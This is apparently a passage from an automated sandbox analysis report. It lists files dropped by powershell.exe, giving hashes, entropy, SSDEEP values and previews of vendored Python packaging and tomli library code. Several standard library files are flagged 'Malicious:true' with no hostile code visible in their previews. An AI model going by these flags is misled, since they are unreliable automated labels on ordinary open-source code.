                                                                                                                                                                                                                              Preview:import contextlib.import re.from dataclasses import dataclass.from typing import Dict, Iterator, NoReturn, Optional, Tuple, Union..from .specifiers import Specifier...@dataclass.class Token:. name: str. text: str. position: int...class ParserSyntaxError(Exception):. """The provided source text could not be parsed correctly.""".. def __init__(. self,. message: str,. *,. source: str,. span: Tuple[int, int],. ) -> None:. self.span = span. self.message = message. self.source = source.. super().__init__().. def __str__(self) -> str:. marker = " " * self.span[0] + "~" * (self.span[1] - self.span[0]) + "^". return "\n ".join([self.message, self.source, marker])...DEFAULT_RULES: "Dict[str, Union[str, re.Pattern[str]]]" = {. "LEFT_PARENTHESIS": r"\(",. "RIGHT_PARENTHESIS": r"\)",. "LEFT_BRACKET": r"\[",. "RIGHT_BRACKET": r"\]",. "SEMICOLON": r";",. "COMMA": r",",. "QUOTED_ST
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, Unicode text, UTF-8 text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8208
                                                                                                                                                                                                                              Entropy (8bit):4.568374252077499
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:FxkiMUg/KnH3wlMdY9LJDR4koqnqIFYSCpP+vC:FxkiMU7H3PdYJHzDq2CpGvC
                                                                                                                                                                                                                              MD5:8B2845880A67D4D1934F095997F295D2
                                                                                                                                                                                                                              SHA1:BBFF1E2E446B8C2F30C89D5E7E62E9EB844CE8EE
                                                                                                                                                                                                                              SHA-256:787FADC52DB3AB51DD3694DDF4B71951C548C1EC0088D53482B9AAE708CA9CE9
                                                                                                                                                                                                                              SHA-512:F68802B219D23EEFB852BB9EC9BD9459BEB3ED441A7B9FCCC6BACF71F2E40C97CFE4686292151D71C9A8CC031DF1FC5B9CA24EE2D957B9D5919EBB8A7410EC19
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...import operator.import os.import platform.import sys.from typing import Any, Callable, Dict, List, Optional, Tuple, Union..from ._parser import (. MarkerAtom,. MarkerList,. Op,. Value,. Variable,. parse_marker as _parse_marker,.).from ._tokenizer import ParserSyntaxError.from .specifiers import InvalidSpecifier, Specifier.from .utils import canonicalize_name..__all__ = [. "InvalidMarker",. "UndefinedComparison",. "UndefinedEnvironmentName",. "Marker",. "default_environment",.]..Operator = Callable[[str, str], bool]...class InvalidMarker(ValueError):. """. An invalid marker was found, users should refer to PEP 508.. """...class UndefinedComparison(ValueError):. """. An invalid operation was attempted on a value that doesn't support it.. """...class UndefinedE
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):33036
                                                                                                                                                                                                                              Entropy (8bit):4.535467696392991
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:wLVtH4V0XF+CJI/fo4V4LMKkjexCR+zcos1nQPxMoKYOGNZFdPTJpnXCaABrDkXE:pGFPMorCMxFKWJjpnXCadk9pULX+
                                                                                                                                                                                                                              MD5:335F6F519B9D71313D14DF34C7891643
                                                                                                                                                                                                                              SHA1:8C507EC0D446AA90DFB449FDB0DF3CE05DB470BE
                                                                                                                                                                                                                              SHA-256:C3B8CF120EA60DFD454D9327EFD685C45BA4E122ADCA7509B71AF62274F1955E
                                                                                                                                                                                                                              SHA-512:1241BB68BFA1042425B31458D8FDD2D70FD2E8C231D528C2AAEBE75488FC6331CE774FDD816713163D5F5BCA73914731C475E6DF440AB6F69944FC4BA9AB57FA
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:import email.feedparser.import email.header.import email.message.import email.parser.import email.policy.import sys.import typing.from typing import (. Any,. Callable,. Dict,. Generic,. List,. Optional,. Tuple,. Type,. Union,. cast,.)..from . import requirements, specifiers, utils, version as version_module..T = typing.TypeVar("T").if sys.version_info[:2] >= (3, 8): # pragma: no cover. from typing import Literal, TypedDict.else: # pragma: no cover. if typing.TYPE_CHECKING:. from typing_extensions import Literal, TypedDict. else:. try:. from typing_extensions import Literal, TypedDict. except ImportError:.. class Literal:. def __init_subclass__(*_args, **_kwargs):. pass.. class TypedDict:. def __init_subclass__(*_args, **_kwargs):. pass...try:. ExceptionGroup.except NameError: # pragma: no cover.. class ExceptionGroup(E
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2933
                                                                                                                                                                                                                              Entropy (8bit):4.443795848749177
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:IDod2NqNX937JaIzGJPLmWJd90P9ZOIFg3ndKo6zjmECXrx9T6zOf5rB2:Fd2NqNtRzOr90uIFk5ax
                                                                                                                                                                                                                              MD5:E382E00F0324AB05297D8368F1071DCF
                                                                                                                                                                                                                              SHA1:FDEA96EE084C035525FACE93ABE03E82D55A8F8E
                                                                                                                                                                                                                              SHA-256:760A01795A6B3EED9813A43C9C67F038F4E30131DB45AFD918BC978451259FA4
                                                                                                                                                                                                                              SHA-512:8F7C309672065EE368CB58EBFD7CB23B7B6451353232A11CF4738E57CBFD882C0BCAA837E9B3228DBC61126E20813F943DDA030F76570382CD8B08C2B0E56E6D
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...from typing import Any, Iterator, Optional, Set..from ._parser import parse_requirement as _parse_requirement.from ._tokenizer import ParserSyntaxError.from .markers import Marker, _normalize_extra_values.from .specifiers import SpecifierSet.from .utils import canonicalize_name...class InvalidRequirement(ValueError):. """. An invalid requirement was found, users should refer to PEP 508.. """...class Requirement:. """Parse a requirement... Parse a given requirement string into its parts, such as name, specifier,. URL, and extras. Raises InvalidRequirement on a badly-formed requirement. string.. """.. # TODO: Can we test whether something is contained within a requirement?. # If so how do we do that? Do we need to test against the _name_ of. # the thing as well as t
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):39784
                                                                                                                                                                                                                              Entropy (8bit):4.441493685077479
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:Y1NKPByxlwhOuhnuxhCI6ljtNWK+pKVyhC0fjrvp32nKmn9WKCpa7:Y1N0excI6l5NWbpewhSKkWVpK
                                                                                                                                                                                                                              MD5:8566B43B5AFD9AFBCB78972C18C711A3
                                                                                                                                                                                                                              SHA1:E425F253D2F73ACCF0FDAD0AA6107497BBB84661
                                                                                                                                                                                                                              SHA-256:741D83C1B9AF49B12E562944CA2210DFCD987D6E497F0CD74DF4513D5B5A10D6
                                                                                                                                                                                                                              SHA-512:8A0B6CBD9CC6B19ED8A58D888AE791BD4A94E41E62118B4C7F2B98B89C754AAE9A4D455920A0930E3BED02A36A65A5E051DE12D09E173D38C87B1C3549B00169
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details.."""... testsetup::.. from packaging.specifiers import Specifier, SpecifierSet, InvalidSpecifier. from packaging.version import Version."""..import abc.import itertools.import re.from typing import Callable, Iterable, Iterator, List, Optional, Tuple, TypeVar, Union..from .utils import canonicalize_version.from .version import Version..UnparsedVersion = Union[Version, str].UnparsedVersionVar = TypeVar("UnparsedVersionVar", bound=UnparsedVersion).CallableOperator = Callable[[Version, str], bool]...def _coerce_version(version: UnparsedVersion) -> Version:. if not isinstance(version, Version):. version = Version(version). return version...class InvalidSpecifier(ValueError):. """. Raised when attempting to create a :class:`Specifier` with a specifier. string that is invalid... >>> Spe
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):18950
                                                                                                                                                                                                                              Entropy (8bit):4.687504376606725
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:FndQaA/tD9En9x6eTYdo7jQ+hZAddAhj85lV37oQYKMKEpXlpRhtzeVze2XzuWCN:pdg+9x68YdujzsddAhj85lV37oQ3D6X3
                                                                                                                                                                                                                              MD5:95CCA11079345584A15997A4714C428B
                                                                                                                                                                                                                              SHA1:D0E8626CB65A650CF790493BE9981F427EEC05C7
                                                                                                                                                                                                                              SHA-256:7DE7475E2387901C4D6535E8B57BFCB973E630553D69EF93281BA38181E281C0
                                                                                                                                                                                                                              SHA-512:AB91AF577CDAF4904526776E866B284E062796E38BE59B7A259D47F6FB8BF8E9856153D362BE977090302F799B4A9CB03E4FC161DF6B0DFA59337EE3D57C7E8D
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...import logging.import platform.import re.import struct.import subprocess.import sys.import sysconfig.from importlib.machinery import EXTENSION_SUFFIXES.from typing import (. Dict,. FrozenSet,. Iterable,. Iterator,. List,. Optional,. Sequence,. Tuple,. Union,. cast,.)..from . import _manylinux, _musllinux..logger = logging.getLogger(__name__)..PythonVersion = Sequence[int].MacVersion = Tuple[int, int]..INTERPRETER_SHORT_NAMES: Dict[str, str] = {. "python": "py", # Generic.. "cpython": "cp",. "pypy": "pp",. "ironpython": "ip",. "jython": "jy",.}..._32_BIT_INTERPRETER = struct.calcsize("P") == 4...class Tag:. """. A representation of the tag triple for a wheel... Instances are considered immutable and thus are hashable. Equality checking. is also support
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):5268
                                                                                                                                                                                                                              Entropy (8bit):4.762294334777613
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:FXX44agWh6e6RG/i1B7ynfVSYBo3EQrdip7criAfb90Cni6excWsc83Y:F37Rz6fbTBNcwC/2r34Y
                                                                                                                                                                                                                              MD5:1AC0C32397B431699625A378F6C21ED2
                                                                                                                                                                                                                              SHA1:832A86EDB71C6C5E128F0A4172FD063DE7858E71
                                                                                                                                                                                                                              SHA-256:5E07663F7CB1F7EC101058CEECEBCC8FD46311FE49951E4714547AF6FED243D1
                                                                                                                                                                                                                              SHA-512:54397C2F88A2440999BC2FFCE86DAEF0B5A2657B1BAFB23E5A81EBB655D8930C39DFAA4306ED6796F14BBCE2391ECCDEC993B5CD853DB58F9076F125296939BD
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...import re.from typing import FrozenSet, NewType, Tuple, Union, cast..from .tags import Tag, parse_tag.from .version import InvalidVersion, Version..BuildTag = Union[Tuple[()], Tuple[int, str]].NormalizedName = NewType("NormalizedName", str)...class InvalidName(ValueError):. """. An invalid distribution name; users should refer to the packaging user guide.. """...class InvalidWheelFilename(ValueError):. """. An invalid wheel filename was found, users should refer to PEP 427.. """...class InvalidSdistFilename(ValueError):. """. An invalid sdist filename was found, users should refer to the packaging user guide.. """...# Core metadata spec for `Name`._validate_regex = re.compile(. r"^([A-Z0-9]|[A-Z0-9][A-Z0-9._-]*[A-Z0-9])$", re.IGNORECASE.)._canonicalize_regex = re.compile(r"[-_.]
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):16236
                                                                                                                                                                                                                              Entropy (8bit):4.553377083910243
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:FG3wpOwEYj7/wfYRZtxQIsN3NQ1lrr6KUwF:IcOwEYj7dztsN6lrr6Kr
                                                                                                                                                                                                                              MD5:7C3195AA2C7C90BDFCB1E43CDCFE4AB4
                                                                                                                                                                                                                              SHA1:2EE37518841D7283796CF5836D1B8868ED60C342
                                                                                                                                                                                                                              SHA-256:5E34412CD2B5ED430380B78FF141E7AB0898DD37528B4DF1150511B5E736D750
                                                                                                                                                                                                                              SHA-512:5455F32405783A564F794F5346E5D484166B60A21FD679ACFE6B41EE8AF059CFFAC857F90EFE0164B81F3469E12DF44713B90AFC4ED75A149AE500DEE3F86AA1
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details.."""... testsetup::.. from packaging.version import parse, Version."""..import itertools.import re.from typing import Any, Callable, NamedTuple, Optional, SupportsInt, Tuple, Union..from ._structures import Infinity, InfinityType, NegativeInfinity, NegativeInfinityType..__all__ = ["VERSION_PATTERN", "parse", "Version", "InvalidVersion"]..LocalType = Tuple[Union[int, str], ...]..CmpPrePostDevType = Union[InfinityType, NegativeInfinityType, Tuple[str, int]].CmpLocalType = Union[. NegativeInfinityType,. Tuple[Union[Tuple[int, str], Tuple[NegativeInfinityType, Union[int, str]]], ...],.].CmpKey = Tuple[. int,. Tuple[int, ...],. CmpPrePostDevType,. CmpPrePostDevType,. CmpPrePostDevType,. CmpLocalType,.].VersionComparisonMethod = Callable[[CmpKey, CmpKey], bool]...class _Version(NamedTuple)
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):396
                                                                                                                                                                                                                              Entropy (8bit):5.139885494061636
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:5O+xp89TQSnGqR65UEux5mlFL/u0+X8tN:5O8piT8qMmE6yM0+S
                                                                                                                                                                                                                              MD5:EB1B063B57DAF5569FBF24247A217FB9
                                                                                                                                                                                                                              SHA1:74C49FB12ED49EF70739F0F9ABABCD0CD7346FB9
                                                                                                                                                                                                                              SHA-256:26153057AE830758381EFB7551009531D7C2BBE220015F055E6BC353DA27C5DE
                                                                                                                                                                                                                              SHA-512:0900E635F035F91125BFE1CFE09240965122188669ECA7CF2405D012A4612570EA6785D9036AB8BD787E5B31E7D392B01677BEA20DE320A43918E77FB9657341
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# SPDX-License-Identifier: MIT.# SPDX-FileCopyrightText: 2021 Taneli Hukkinen.# Licensed to PSF under a Contributor Agreement...__all__ = ("loads", "load", "TOMLDecodeError").__version__ = "2.0.1" # DO NOT EDIT THIS LINE MANUALLY. LET bump2version UTILITY DO IT..from ._parser import TOMLDecodeError, load, loads..# Pretend this exception was created here..TOMLDecodeError.__module__ = __name__.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):375
                                                                                                                                                                                                                              Entropy (8bit):5.186316109639552
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:Tk+lk6SsmlV5uuU4pWj4V6Bh/cP0N/cPy/LIKBltYw52KNdAr8p7lZhdR6IaptMu:ov6SsmlV8X4AEcfN/9TBPqKNxVlxRjax
                                                                                                                                                                                                                              MD5:B63CC79511A26872B826F66B17DBC7AB
                                                                                                                                                                                                                              SHA1:07A93AA198246A32CC07C1A5223F6F741EBB5F47
                                                                                                                                                                                                                              SHA-256:35038021A1AEE31AB0EB118480FBC9E0689DB0A00E9DBC46C9BE6F5307391B92
                                                                                                                                                                                                                              SHA-512:4B438AD761872B3286F619B1F397CE2B80C1A5FF41853F353FD1752972753FF7EFF270974DBA81BC4526B9C8DFCE077751A6FEC2EB157A0EBFD09E306D09E4A6
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........x.Vf................................d.Z.d.Z.d.d.l.m.Z.m.Z.m.Z...e.e._.........y.).)...loads..load..TOMLDecodeErrorz.2.0.1.....).r....r....r....N)...__all__..__version__.._parserr....r....r......__name__..__module__........RC:\Users\xbov\Desktop\pyops\Lib\site-packages\setuptools/_vendor/tomli/__init__.py..<module>r........s!............/.........1..1....&.....r....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):26918
                                                                                                                                                                                                                              Entropy (8bit):5.41262070999864
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:4EzWBd8hv5qFDwotd1vepYviepF+DashSM4QCCLK/+hlU:Fi/Gv5M0ox2uNSdSOCCe/cU
                                                                                                                                                                                                                              MD5:75AA6C37664041C66A3D042DE8522817
                                                                                                                                                                                                                              SHA1:A7379BEE879576DC7E131E9ECC84D504C5F8E986
                                                                                                                                                                                                                              SHA-256:35E58CD2D9323F00FADB21ACC2CCA5FFD5D38695F5C9A03A41BDF9C0894585D4
                                                                                                                                                                                                                              SHA-512:B42373625C04B35227B98B59ED2C99D3B7088F84E394F4FD2D8F9AC677C1B118B3748BEF2D83DD9D7A01701083A23E41306245AE52C201D98F361BEDD1F4A8D5
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........x.VfiX........................H.....d.d.l.m.Z...d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.....e.d.....e.d.........D...................e...e.d.................z...Z.e...e.d.........z...Z.e...e.d.........z...Z.e.Z.e.Z.e.Z...e.d.........Z.e...e.d.........z...Z ..e.e.jB..................e.jD..................z...d.z...........Z#e#..e.d.........z...Z$..e.e.jJ..........................Z&..e.d.d.d.d.d.d.d.d...........Z'..G.d...d.e(........Z)e*d...d<d...Z+e*d...d=d...Z,..G.d...d.........Z-..G.d...d ........Z...G.d!..d"e.........Z/d>d#..Z0........................d?d$..Z1d@d%..Z2d@d&..Z3dAd'..Z4dAd(..Z5........................dBd)..Z6................dCd*..Z7dDd+..Z8dEd,..Z9dEd-..Z:dFd...Z;dGd/..Z<d0d1................dHd2..Z=dEd3..Z>dId4..Z?dEd5..Z@dJd6..ZAdHd7..ZB................dKd8..ZCdLd9..ZDdMd:..ZEdNd;..ZFy.)O.....)...annotations)...IterableN)...MappingProxyType)...Any..BinaryIO..NamedTuple.....)...RE_DATETIME..RE_LOCALTIME
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3899
                                                                                                                                                                                                                              Entropy (8bit):5.574336798461824
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:C4IBhdvav0ke+SYl1AH1BP+TcP3d/CxdT2MGyfbQO5gZmkp/oGaeRTFBZO/HfRfu:+hhjke3UM10qZCPTx5fb9Epbk/Jfa
                                                                                                                                                                                                                              MD5:585ADAD128823249D0BBACCC687F29E1
                                                                                                                                                                                                                              SHA1:59DCDD891D07772151B6684E1FD65DEF28818F60
                                                                                                                                                                                                                              SHA-256:5DD12050BEC8DBF0B0BA138CC83BD8432FE724B327B95BDCCFDB43C116EFDC29
                                                                                                                                                                                                                              SHA-512:829596784925C77D83117C52F08059CDA0BD2BA42657EC874CAEADC32B7D741BA9084D528CA033FEC728A6E788679FD7F3632E8D2708316041520AF2E6856858
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........x.Vf..........................<.....d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.Z...e.j ..................d.e.j"............................Z...e.j ..................e.........Z...e.j ..................d.e...d...e.j"............................Z.d.d...Z...e.d...........d.d...........Z.d.d...Z.d.d...Z.y.)......)...annotations)...date..datetime..time..timedelta..timezone..tzinfo)...lru_cacheN)...Any.....)...ParseFloatzE([01][0-9]|2[0-3]):([0-5][0-9]):([0-5][0-9])(?:\.([0-9]{1,6})[0-9]*)?a`....0.(?:. x[0-9A-Fa-f](?:_?[0-9A-Fa-f])* # hex. |. b[01](?:_?[01])* # bin. |. o[0-7](?:_?[0-7])* # oct.).|.[+-]?(?:0|[1-9](?:_?[0-9])*) # dec, integer part.(?P<floatpart>. (?:\.[0-9](?:_?[0-9])*)? # optional fractional part. (?:[eE][+-]?[0-9](?:_?[0-9])*)? # optional exponent part.).)...flagsz`.([0-9]{4})-(0[1-9]|1[0-2])-(0[1-9]|[12][0-9]|3[01]) # date, e.g. 1988-10-27.(?:. [T
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):357
                                                                                                                                                                                                                              Entropy (8bit):5.359008952672809
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:GHBvaEIURrlzJmpVixC2lJO/vXsJOtOw52KNdAr8p7lZhpng2aAkk8gmpU1qTilo:GHJRr670C2lJOnsJOt8KNxVlhg2aAkkC
                                                                                                                                                                                                                              MD5:42802D5D52CA305967B949730B72E839
                                                                                                                                                                                                                              SHA1:0F629BD9A1AEB2EE24FF17C751698DB38581D241
                                                                                                                                                                                                                              SHA-256:D575DFC929592DB935DA0753463F9D97301DF493639ACAE3C4736CDCAF6EF16D
                                                                                                                                                                                                                              SHA-512:18B27B7457B0B185E87C09D409D90E6D2D51A6B8B655A3B3BCF270EB69EFF39B269D79686DE693D22453BACB3BE0779E34BA0E65A6FD33D9EB2D607E8B170C72
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........x.Vf..........................:.....d.d.l.m.Z.m.Z.m.Z...e.e.g.e.f.....Z.e.e.d.f.....Z.e.Z.y.)......)...Any..Callable..Tuple.N)...typingr....r....r......str..ParseFloat..Key..int..Pos........PC:\Users\xbov\Desktop\pyops\Lib\site-packages\setuptools/_vendor/tomli/_types.py..<module>r........s1............(..'......s.e.S.j..!......C...H.o.......r....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):22633
                                                                                                                                                                                                                              Entropy (8bit):4.67342712908563
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:e71Y6S2ekJKFeaft8j97n2pxPTq+tcTngIrHv8vMuUQZBj4iwkk8:eJY6SNkJKFnl8j9vwEgIrHEvMuU+Bj4Q
                                                                                                                                                                                                                              MD5:F67CD21BFA4C3AFF92F17E6D06373CCC
                                                                                                                                                                                                                              SHA1:C21682D8065B4C6319654107C4D1691000551A96
                                                                                                                                                                                                                              SHA-256:83DF8435A00B4BE07C768918A42BB35056A55A5A20ED3F922183232D9496AED3
                                                                                                                                                                                                                              SHA-512:37EFE1A5E34AA9F8A7D09588DC9C5BA1F86AF035DCA297A375F0D0485F9ED14DCFECF0EF47B3B6817639A813B0E37BA78B140728342FF66D2BB7E899A3F52A9E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# SPDX-License-Identifier: MIT.# SPDX-FileCopyrightText: 2021 Taneli Hukkinen.# Licensed to PSF under a Contributor Agreement...from __future__ import annotations..from collections.abc import Iterable.import string.from types import MappingProxyType.from typing import Any, BinaryIO, NamedTuple..from ._re import (. RE_DATETIME,. RE_LOCALTIME,. RE_NUMBER,. match_to_datetime,. match_to_localtime,. match_to_number,.).from ._types import Key, ParseFloat, Pos..ASCII_CTRL = frozenset(chr(i) for i in range(32)) | frozenset(chr(127))..# Neither of these sets include quotation mark or backslash. They are.# currently handled as separate cases in the parser functions..ILLEGAL_BASIC_STR_CHARS = ASCII_CTRL - frozenset("\t").ILLEGAL_MULTILINE_BASIC_STR_CHARS = ASCII_CTRL - frozenset("\t\n")..ILLEGAL_LITERAL_STR_CHARS = ILLEGAL_BASIC_STR_CHARS.ILLEGAL_MULTILINE_LITERAL_STR_CHARS = ILLEGAL_MULTILINE_BASIC_STR_CHARS..ILLEGAL_COMMENT_CHARS = ILLEGAL_BASIC_STR_CHARS..TOML_WS = frozenset(
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2943
                                                                                                                                                                                                                              Entropy (8bit):4.97581664014055
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:8qJnOFJmPEwYUvke+Sq/RAHtvtTcP3dCmUdtVHDo7fXWq4NcPEY:fowfvke3AMtVqcz6IcPt
                                                                                                                                                                                                                              MD5:0111DF35A25A503E0247F50838D35AEA
                                                                                                                                                                                                                              SHA1:41D8D0205AE11DA5308581E62DF6DA123BE415ED
                                                                                                                                                                                                                              SHA-256:75B8E0E428594F6DCA6BDCFD0C73977DDB52A4FC147DD80C5E78FC34EA25CBEC
                                                                                                                                                                                                                              SHA-512:CD58581A287C723F687CDB08646EF7453CCAB59E73145F1367119D6BEB61DFDCC6F97C6186112D849E37FD31EB6750EC20BEF3795E57729A0306E537D9216907
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# SPDX-License-Identifier: MIT.# SPDX-FileCopyrightText: 2021 Taneli Hukkinen.# Licensed to PSF under a Contributor Agreement...from __future__ import annotations..from datetime import date, datetime, time, timedelta, timezone, tzinfo.from functools import lru_cache.import re.from typing import Any..from ._types import ParseFloat..# E.g..# - 00:32:00.999999.# - 00:32:00._TIME_RE_STR = r"([01][0-9]|2[0-3]):([0-5][0-9]):([0-5][0-9])(?:\.([0-9]{1,6})[0-9]*)?"..RE_NUMBER = re.compile(. r""".0.(?:. x[0-9A-Fa-f](?:_?[0-9A-Fa-f])* # hex. |. b[01](?:_?[01])* # bin. |. o[0-7](?:_?[0-7])* # oct.).|.[+-]?(?:0|[1-9](?:_?[0-9])*) # dec, integer part.(?P<floatpart>. (?:\.[0-9](?:_?[0-9])*)? # optional fractional part. (?:[eE][+-]?[0-9](?:_?[0-9])*)? # optional exponent part.).""",. flags=re.VERBOSE,.).RE_LOCALTIME = re.compile(_TIME_RE_STR).RE_DATETIME = re.compile(. rf""".([0-9]{{4}})-(0[1-9]|1[0-2])-(0[1-9]|[12][0-9]|3[
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):254
                                                                                                                                                                                                                              Entropy (8bit):4.976783622352379
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SAgLRatxp89TQSnGDEYBFpkoL+RBZuCw+mkILmt:5O+xp89TQSnGDEYBpnLyILmt
                                                                                                                                                                                                                              MD5:19A32B713392E66BAC544E73F025B2CB
                                                                                                                                                                                                                              SHA1:6DC6337D888EDEA5138A094E517BE6C0E4BD09F4
                                                                                                                                                                                                                              SHA-256:F864C6D9552A929C7032ACE654EE05EF26CA75D21B027B801D77E65907138B74
                                                                                                                                                                                                                              SHA-512:C3D610738DC0E26F5645C200C6D1BD121642C5C2E71A2A235A702C2F5902E5CBE641016B6B79B1947E327B92216DEDB40947D4247BB8913B138BE0A440C0C28A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# SPDX-License-Identifier: MIT.# SPDX-FileCopyrightText: 2021 Taneli Hukkinen.# Licensed to PSF under a Contributor Agreement...from typing import Any, Callable, Tuple..# Type annotations.ParseFloat = Callable[[str], Any].Key = Tuple[str, ...].Pos = int.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):26
                                                                                                                                                                                                                              Entropy (8bit):3.8402655651949273
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SZeW0FOo2:SZeRFH2
                                                                                                                                                                                                                              MD5:BD2FA011A5E69D2B68DF68FBC59F8BE6
                                                                                                                                                                                                                              SHA1:C6EB45191EAFD8DEAC33DAD1803B14305F841347
                                                                                                                                                                                                                              SHA-256:F0F8F2675695A10A5156FB7BD66BAFBAAE6A13E8D315990AF862C792175E6E67
